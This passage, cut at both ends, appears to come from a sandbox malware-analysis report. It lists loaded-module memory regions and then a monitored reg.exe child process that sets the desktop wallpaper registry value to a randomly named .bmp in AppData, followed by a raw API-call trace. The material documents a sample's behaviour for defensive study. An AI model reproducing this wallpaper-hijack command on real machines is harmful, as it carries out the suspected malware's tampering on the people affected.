"rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 916 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 917 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 918 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 919 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 920 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 921 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 922 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 923 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 924 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1352 start_va = 0xd20dd70000 end_va = 0xd20dd73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d20dd70000" filename = "" Region: id = 1353 start_va = 0xd20dd80000 end_va = 0xd20dd86fff entry_point = 0x0 region_type = private name = "private_0x000000d20dd80000" filename = "" Region: id = 1354 start_va = 0xd20dd90000 end_va = 0xd20dd94fff entry_point = 0xd20dd90000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1355 start_va = 0xd20f4d0000 end_va = 0xd20f50ffff entry_point = 0x0 region_type = private name = "private_0x000000d20f4d0000" filename = "" Region: id = 1356 start_va = 0xd20f510000 end_va = 0xd20f510fff entry_point = 0xd20f510000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1357 start_va = 0xd20f520000 end_va = 0xd20f521fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d20f520000" filename = "" Region: id = 1358 start_va = 0xd20f530000 end_va = 0xd20f530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d20f530000" filename = "" Region: id = 1359 start_va = 0xd20f5c0000 end_va = 0xd20f5cffff entry_point = 0x0 region_type = private name = "private_0x000000d20f5c0000" filename = "" Region: id = 1360 start_va = 0xd20f660000 end_va = 0xd20f66ffff entry_point = 0x0 region_type = private name = "private_0x000000d20f660000" filename = "" Region: id = 1361 start_va = 0xd20f670000 end_va = 0xd20f9a6fff entry_point = 0xd20f670000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1362 start_va = 0xd20f9b0000 end_va = 0xd20fbc4fff entry_point = 0x0 region_type = private name = "private_0x000000d20f9b0000" filename = "" Region: id = 1363 start_va = 0xd20fbd0000 end_va = 0xd20fdedfff entry_point = 0x0 region_type = private name = "private_0x000000d20fbd0000" filename = "" Region: id = 1364 start_va = 0xd20fdf0000 end_va = 0xd20fefefff entry_point = 0x0 region_type = private name = "private_0x000000d20fdf0000" filename = "" Region: id = 1365 start_va = 0xd20ff00000 end_va = 0xd21011dfff entry_point = 0x0 region_type = private name = "private_0x000000d20ff00000" filename = "" Region: id = 1366 start_va = 0xd210120000 end_va = 0xd210233fff entry_point = 0x0 region_type = private name = "private_0x000000d210120000" filename = "" Region: id = 1367 start_va = 0xd210240000 end_va = 0xd2102f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d210240000" filename = "" Region: id = 1368 start_va = 0x7ff7fd0ca000 end_va = 0x7ff7fd0cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd0ca000" filename = "" Region: id = 1369 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 1370 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1371 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1372 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1373 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1374 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1375 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1376 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1377 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1378 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1379 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1380 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1381 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 95 os_tid = 0xfb8 Thread: id = 98 os_tid = 0xfc4 Thread: id = 99 os_tid = 0xfc8 Thread: id = 104 os_tid = 0xfe0 Process: id = "11" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x60a97000" os_pid = "0xdfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xf9c" cmd_line = "reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp\" /f " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1026 start_va = 0x900000 end_va = 0x952fff entry_point = 0x900000 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\SysWOW64\\reg.exe" (normalized: "c:\\windows\\syswow64\\reg.exe") Region: id = 1027 start_va = 0xc30000 end_va = 0x4c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 1028 start_va = 0x4c30000 end_va = 0x4c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 1029 start_va = 0x4c50000 end_va = 0x4c51fff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 1030 start_va = 0x4c60000 end_va = 0x4c73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 1031 start_va = 0x4c80000 end_va = 0x4cbffff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 1032 start_va = 0x4cc0000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 1033 start_va = 0x4d00000 end_va = 0x4d03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d00000" filename = "" Region: id = 1034 start_va = 0x4d10000 end_va = 0x4d10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d10000" filename = "" Region: id = 1035 start_va = 0x4d20000 end_va = 0x4d21fff entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 1036 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1037 start_va = 0x7f9c0000 end_va = 0x7f9e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f9c0000" filename = "" Region: id = 1038 start_va = 0x7f9e5000 end_va = 0x7f9e5fff entry_point = 0x0 region_type = private name = "private_0x000000007f9e5000" filename = "" Region: id = 1039 start_va = 0x7f9eb000 end_va = 0x7f9edfff entry_point = 0x0 region_type = private name = "private_0x000000007f9eb000" filename = "" Region: id = 1040 start_va = 0x7f9ee000 end_va = 0x7f9eefff entry_point = 0x0 region_type = private name = "private_0x000000007f9ee000" filename = "" Region: id = 1041 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1042 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1043 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1044 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1045 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1081 start_va = 0x4f20000 end_va = 0x4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 1082 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1083 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1084 start_va = 0x5100000 end_va = 0x51fffff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 1085 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1093 start_va = 0x4c30000 end_va = 0x4c3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c30000" filename = "" Region: id = 1094 start_va = 0x4c40000 end_va = 0x4c43fff entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 1095 start_va = 0x4d30000 end_va = 0x4dedfff entry_point = 0x4d30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1096 start_va = 0x4df0000 end_va = 0x4e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 1097 start_va = 0x4e30000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 1098 start_va = 0x4f00000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1099 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1100 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1101 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1102 start_va = 0x74ac0000 end_va = 0x74ac6fff entry_point = 0x74ac0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1103 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1104 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1105 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1106 start_va = 0x76ed0000 end_va = 0x76f2bfff entry_point = 0x76ed0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1107 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1108 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1109 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1110 start_va = 0x7f8c0000 end_va = 0x7f9bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f8c0000" filename = "" Region: id = 1111 start_va = 0x7f9e8000 end_va = 0x7f9eafff entry_point = 0x0 region_type = private name = "private_0x000000007f9e8000" filename = "" Region: id = 1112 start_va = 0x5200000 end_va = 0x5536fff entry_point = 0x5200000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1138 start_va = 0x4c50000 end_va = 0x4c59fff entry_point = 0x4c50000 region_type = mapped_file name = "reg.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\reg.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\reg.exe.mui") Region: id = 1140 start_va = 0x4f30000 end_va = 0x500efff entry_point = 0x4f30000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 118 os_tid = 0x224 [0202.011] GetModuleHandleA (lpModuleName=0x0) returned 0x900000 [0202.012] __set_app_type (_Type=0x1) [0202.012] __p__fmode () returned 0x77984d6c [0202.012] __p__commode () returned 0x77985b1c [0202.012] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x90ca50) returned 0x0 [0202.012] __wgetmainargs (in: _Argc=0x90e028, _Argv=0x90e02c, _Env=0x90e030, _DoWildCard=0, _StartInfo=0x90e03c | out: _Argc=0x90e028, _Argv=0x90e02c, _Env=0x90e030) returned 0 [0202.012] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0202.014] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0202.014] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x4cffa5c | out: phkResult=0x4cffa5c*=0x0) returned 0x2 [0202.014] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0202.014] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0202.014] lstrlenW (lpString="") returned 0 [0202.015] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.072] _memicmp (_Buf1=0x5107848, _Buf2=0x901b04, _Size=0x7) returned 0 [0202.072] lstrlenW (lpString="HKCU\\Control Panel\\Desktop") returned 26 [0202.072] _memicmp (_Buf1=0x51077e8, _Buf2=0x901b04, _Size=0x7) returned 0 [0202.072] _vsnwprintf (in: _Buffer=0x5102770, _BufferCount=0xe, _Format="|%s|", _ArgList=0x4cff970 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0202.072] _vsnwprintf (in: _Buffer=0x5103990, _BufferCount=0x1d, _Format="|%s|", _ArgList=0x4cff970 | out: _Buffer="|HKCU\\Control Panel\\Desktop|") returned 28 [0202.072] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0202.072] lstrlenW (lpString="|HKCU\\Control Panel\\Desktop|") returned 28 [0202.072] RtlRestoreLastWin32Error () returned 0x490 [0202.073] lstrlenW (lpString="HKCU\\Control Panel\\Desktop") returned 26 [0202.073] lstrlenW (lpString="HKCU\\Control Panel\\Desktop") returned 26 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0202.073] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0202.073] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0202.073] lstrlenW (lpString="HKCU\\Control Panel\\Desktop") returned 26 [0202.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\Control Panel\\Desktop", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0202.073] lstrlenW (lpString="HKCU\\Control Panel\\Desktop") returned 26 [0202.073] lstrlenW (lpString="HKCU\\Control Panel\\Desktop") returned 26 [0202.073] StrChrIW (lpStart="HKCU\\Control Panel\\Desktop", wMatch=0x5c) returned="\\Control Panel\\Desktop" [0202.074] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0202.074] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0202.074] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0202.074] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0202.074] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0202.074] StrChrIW (lpStart="Control Panel\\Desktop", wMatch=0x5c) returned="\\Desktop" [0202.074] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0202.074] StrChrIW (lpStart="Desktop", wMatch=0x5c) returned 0x0 [0202.074] RtlRestoreLastWin32Error () returned 0x490 [0202.074] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0202.074] RtlRestoreLastWin32Error () returned 0x0 [0202.074] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0202.075] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0202.075] lstrlenW (lpString="Wallpaper") returned 9 [0202.075] lstrlenW (lpString="Wallpaper") returned 9 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0202.075] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0202.075] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0202.075] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0202.075] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0202.075] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0202.075] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0202.075] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0202.075] lstrlenW (lpString="REG_SZ") returned 6 [0202.076] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0202.076] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0202.076] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0202.076] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0202.076] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0202.076] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0202.076] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0202.076] LocalFree (hMem=0x5107758) returned 0x0 [0202.076] RtlRestoreLastWin32Error () returned 0x0 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0202.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp") returned 50 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0202.076] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", 